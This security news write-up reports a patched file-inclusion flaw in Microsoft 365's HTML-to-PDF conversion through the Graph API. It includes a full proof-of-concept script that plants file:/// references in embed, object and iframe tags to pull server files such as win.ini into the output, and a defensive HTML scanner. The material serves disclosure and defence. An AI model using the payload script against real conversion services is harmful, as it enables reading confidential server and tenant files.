A recently disclosed Local File Inclusion (LFI) vulnerability in Microsoft 365's PDF export functionality has raised significant security concerns. The flaw let an attacker have files from the conversion server's own file system read during HTML-to-PDF conversion and rendered into the resulting PDF, potentially exposing confidential information. Microsoft has since patched the vulnerability and awarded the researcher a $3,000 bounty for the discovery.

Discovery and Initial Assessment

The vulnerability was uncovered during a routine client assessment, when a security researcher examined a web application feature that converted uploaded documents to PDF and published them on SharePoint. Initially, the researcher suspected a flaw in the client's own application, since the conversion appeared able to read local system files during HTML-to-PDF conversion. Further investigation showed that the application simply called Microsoft's official APIs to perform the conversion, so the file reads were happening inside Microsoft's infrastructure, not the client's.

Technical Details and Exploitation

The core of the vulnerability lay in the Microsoft Graph API endpoint that downloads a drive item in another format. Microsoft's documentation lists the source file types supported for PDF conversion, but the researcher found that HTML, which is not on that list, was converted too. Because the converter rendered the HTML with an engine that honoured <embed>, <object> and <iframe> references, an attacker could point those tags at files on the conversion server and have their contents rendered into the returned PDF. This exposed server-side files such as web.config and win.ini.
The exploitation process involved three steps:
  • Uploading a malicious HTML file via the Graph API.
  • Requesting the uploaded file in PDF format through the conversion endpoint.
  • Downloading the resulting PDF, which contained the included local files.
Because the conversion service is shared, the write-up notes that this could have led to cross-tenant data exposure if an attacker could identify the paths of temporary files left by other tenants' conversions on the same host.
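The three steps above, written out as an added example against the Microsoft Graph v1.0 endpoints (this is not the researcher's or Cyber Press's code). The upload and "download in another format" endpoints are the documented ones; what the page does not confirm, and the example therefore assumes, is the exact file URI form the converter resolved, the target paths, and the token permission (a delegated bearer token in GRAPH_TOKEN with Files.ReadWrite). The flaw is patched, so a live run should come back with a PDF that does not contain the referenced files, or fail.

```python
"""Added example, not code from the researcher or from Cyber Press.

It walks the three steps above against Microsoft Graph using only the
standard library. Assumptions that the page does not confirm:
  * GRAPH_TOKEN holds a delegated bearer token with Files.ReadWrite;
  * the converter resolved ordinary file:// references in the tags the
    page names (the exact URI form used in the report is not given);
  * the sample target paths below.
The flaw is patched, so a live run should produce a PDF without the
referenced file contents (or fail); the request construction is what
the example is meant to show.
"""
import json
import os
import urllib.request
from urllib.parse import quote

GRAPH = "https://graph.microsoft.com/v1.0"

# Files named in the write-up; the paths are assumed for illustration.
TARGET_FILES = [
    "C:/Windows/win.ini",
    "C:/inetpub/wwwroot/web.config",
]


def build_payload(paths):
    """Step 1 payload: HTML that pulls local files in through <embed>,
    <object> and <iframe>, the three tags the write-up names."""
    parts = ["<html><body>"]
    for path in paths:
        uri = "file:///" + path.lstrip("/")
        parts.append(f'<embed src="{uri}" type="text/plain">')
        parts.append(f'<object data="{uri}" type="text/plain"></object>')
        parts.append(f'<iframe src="{uri}"></iframe>')
    parts.append("</body></html>")
    return "\n".join(parts)


def upload_url(name):
    """Step 1: documented simple-upload endpoint
    PUT /me/drive/root:/{path}:/content (files under 4 MB)."""
    return f"{GRAPH}/me/drive/root:/{quote(name)}:/content"


def convert_url(item_id):
    """Steps 2 and 3: documented 'download in another format' endpoint.
    HTML is not listed as a supported source format; relying on it
    anyway is the undocumented behaviour the researcher used."""
    return f"{GRAPH}/me/drive/items/{item_id}/content?format=pdf"


def _call(method, url, token, body=None, content_type=None):
    req = urllib.request.Request(url, data=body, method=method)
    req.add_header("Authorization", f"Bearer {token}")
    if content_type:
        req.add_header("Content-Type", content_type)
    with urllib.request.urlopen(req) as resp:
        return resp.status, resp.read()


def run(token, name="report.html"):
    """Upload the payload, request it as PDF, return the PDF bytes."""
    html = build_payload(TARGET_FILES).encode()
    _, body = _call("PUT", upload_url(name), token, html, "text/html")
    item_id = json.loads(body)["id"]          # driveItem returned by the upload
    # Graph answers with a 302 to a pre-authenticated download URL and
    # urllib follows it (note: urllib re-sends the bearer header on the hop).
    _, pdf = _call("GET", convert_url(item_id), token)
    return pdf


if __name__ == "__main__":
    tok = os.environ.get("GRAPH_TOKEN")
    if not tok:
        print(build_payload(TARGET_FILES))    # offline: just show the payload
    else:
        with open("out.pdf", "wb") as fh:
            fh.write(run(tok))
```

Without GRAPH_TOKEN the script only prints the payload, which is the part worth reading: the whole attack is a plain upload of ordinary-looking HTML followed by one documented download call, so nothing in the request sequence itself looks anomalous to the API.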

Microsoft's Response and Remediation

Upon disclosure, Microsoft classified the vulnerability as "Important" and fixed it in the service. Since the conversion runs inside Microsoft's infrastructure, the fix applies to every caller of the endpoint without customer-side action. The $3,000 bounty is modest for a flaw that, per the write-up, could have exposed server-side and potentially cross-tenant data from Microsoft's cloud infrastructure.

Broader Implications and Best Practices

This incident underscores the importance of thorough security testing of cloud-based file conversion services, including behaviour the documentation does not mention, such as accepting a source format that is not listed. It also shows the value of responsible disclosure in getting such flaws fixed.
Organizations that expose similar functionality, or that pass user-supplied documents to a third-party converter, should:
  • Conduct Regular Security Assessments: Test web applications and the APIs they call, including the cloud services behind them, rather than assuming a vendor API is out of scope.
  • Treat Converter Input as Untrusted: HTML submitted for conversion should be checked before it is handed to any renderer; at minimum reject or strip <embed>, <object> and <iframe> and any reference to a local path, since a renderer that honours them will read whatever the reference points at.
  • Monitor and Audit API Usage: Log conversion requests and watch for patterns that match this attack, such as HTML uploads immediately followed by a format=pdf download, or conversion requests for source types the documentation does not list.
  • Stay Informed on Security Updates: Track vendor advisories for the cloud services you depend on, and apply patches for self-hosted components promptly.
By adhering to these practices, organizations can reduce the chance that a converter they rely on becomes a read primitive against its own host.
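The input check recommended above, as an added example. This is not Microsoft's fix (that was made server-side and is not public); it is a gate an application can run on user-supplied HTML before calling any conversion service. It rejects the three inclusion tags the write-up names and, going one step further than the page, any URL-bearing attribute on any tag that points at a local resource (file: scheme, Windows drive path, UNC path). The sample inputs are constructed.

```python
"""Added example of the input check recommended above; it is not
Microsoft's fix (which was made server-side and is not public).

Run on user-supplied HTML before handing it to any converter. It
rejects the inclusion tags the write-up names and, going one step
further than the page, any URL-bearing attribute that points at a
local resource (file: scheme, Windows drive path, UNC path) on any
tag. Denylists are illustrative; for a production converter prefer
an allowlist of tags and attributes on top of this.
"""
import re
from html.parser import HTMLParser

INCLUSION_TAGS = {"embed", "object", "iframe"}          # named in the write-up
URL_ATTRS = {"src", "data", "href", "codebase", "archive", "poster"}
# file:..., C:\... or C:/..., \\server\share\...
LOCAL_REF = re.compile(r"^\s*(file:|[a-z]:[\\/]|\\\\)", re.IGNORECASE)


class IncludeScanner(HTMLParser):
    """Collects (line, tag, reason) for every suspicious element.
    HTMLParser decodes entities in attribute values, so obfuscation
    such as fi&#108;e: is seen as file:."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        line = self.getpos()[0]
        if tag in INCLUSION_TAGS:
            self.findings.append((line, tag, "inclusion tag"))
        for name, value in attrs:
            if name in URL_ATTRS and value and LOCAL_REF.match(value):
                self.findings.append((line, tag, f"local reference in {name}: {value}"))


def scan_html(html):
    scanner = IncludeScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def is_safe_for_conversion(html):
    """Gate to call before the conversion request is made."""
    return not scan_html(html)


# Constructed samples, modelled on the behaviour the write-up describes.
MALICIOUS = """<html><body>
<iframe src="file:///C:/Windows/win.ini"></iframe>
<img src="C:\\inetpub\\wwwroot\\web.config">
<object data="fi&#108;e:///C:/Windows/win.ini"></object>
</body></html>"""
BENIGN = '<html><body><p>Quarterly report</p><a href="https://example.com/q1">link</a></body></html>'

if __name__ == "__main__":
    for line, tag, reason in scan_html(MALICIOUS):
        print(f"line {line}: <{tag}> {reason}")
    print("benign ok:", is_safe_for_conversion(BENIGN))
```

The check runs on the decoded attribute values, so entity-encoded schemes are caught, but it is still a denylist: a renderer that follows CSS url() references or <link> imports would need those covered too, which is why an allowlist of permitted tags and attributes is the safer baseline for anything that is later rendered by software you do not control.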

Source: Cyber Press LFI Vulnerability in Microsoft 365 PDF Export Lets Attackers Access Confidential Files